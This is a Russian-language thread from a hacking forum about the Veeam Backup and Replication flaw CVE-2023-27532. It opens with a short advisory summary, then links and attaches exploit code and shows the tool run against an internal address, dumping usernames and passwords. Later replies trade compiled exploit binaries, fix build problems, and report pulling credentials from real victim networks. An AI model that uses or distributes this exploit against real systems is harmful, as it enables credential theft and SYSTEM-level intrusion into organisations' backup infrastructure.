• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote Veeam Backup and Replication | CVE-2023-27532

pimpom

RAID-массив
Забанен
Регистрация
26.07.2022
Сообщения
56
Реакции
66
Гарант сделки
2
Пожалуйста, обратите внимание, что пользователь заблокирован
Уязвимость CVE-2023-27532 затрагивает все версии софта и может быть использована неавторизованными злоумышленниками для кражи учетных данных и удаленного выполнения кода от имени SYSTEM.

Veeam выпустила обновления безопасности для устранения этой уязвимости ещё 7 марта и рекомендует клиентам, использующим более старые версии VBR, выполнить обновление, чтобы защитить уязвимые устройства.

Компания также поделилась временным решением для защиты от уязвимости. Системным администраторов, которые не могут моментально развернуть исправления, требуется заблокировать внешние подключения к порту TCP 9401 с помощью брандмауэра резервного сервера.


Отчет о уязвимости.
 

Вложения

  • CVE-2023-27532-master.zip
    7.8 КБ · Просмотры: 114
Код:
https://github.com/horizon3ai/CVE-2023-27532

Код:
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password = 
UserName = root Password = 
UserName = root Password = 
UserName = root Password =
 
Не скупитесь, киньте компил в ЛС. Спасиб.
У вас должно быть более 1 сообщений для просмотра скрытого контента.


Ребята сделайте компил пожалуйста.
этот не компилится, ошибку выдает
 
то что вы скинули скомпилированное, тоже алерт выдает
я собрал из сорцев что было на гите, ничего не менял. , там нужен net 6 . на таргетах не проверял, так как нету сеток для теста. скопилилось без ошибок
1>Done building project "CVE-2023-27532.csproj".
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
 
я собрал из сорцев что было на гите, ничего не менял. , там нужен net 6 . на таргетах не проверял, так как нету сеток для теста. скопилилось без ошибок
1>Done building project "CVE-2023-27532.csproj".
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
интересно почему нет 6 нужен то, в этом и был мой косяк при запуске
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ребята сделайте компил пожалуйста.
Ты тестил?
Там ошибка есть в кавычках, мб в код еще директивы добавить которые там указанны, я хотел затестить, но VS качать не особо много желания, он +-10гб весит, а в vs code сразу говорю не работает, там тулзов нет нужных
 
Кто то смог удачно скомпилить и проверить на работоспособность?
компилится без проблем, отработало на 1 сетке (на 3х вимах). вытащил креды нормально.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
можешь поделиться скомпиленным сплоитом?
Ну вот собранный тот что ты процитировал, только зачем - непонятно. Он собирается в один клик.
И я хз вообще нормально ли работают переданные таким образом dotnet приложения под никсы или их надо обязательно самому собирать.
 
чёта, какта... товарищи, не едут лыжи! запускаю ехешник, выдает Unhandled exception. System.ServiceModel.FaultException`1[System.ServiceModel.ExceptionDetail]
 
чёта, какта... товарищи, не едут лыжи! запускаю ехешник, выдает Unhandled exception. System.ServiceModel.FaultException`1[System.ServiceModel.ExceptionDetail]
у меня отработал на вин 10 с рабочего дедика и с вин сервер 2012,2016 с тачки таргета. проблем не было. но работает не всегда конечно
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх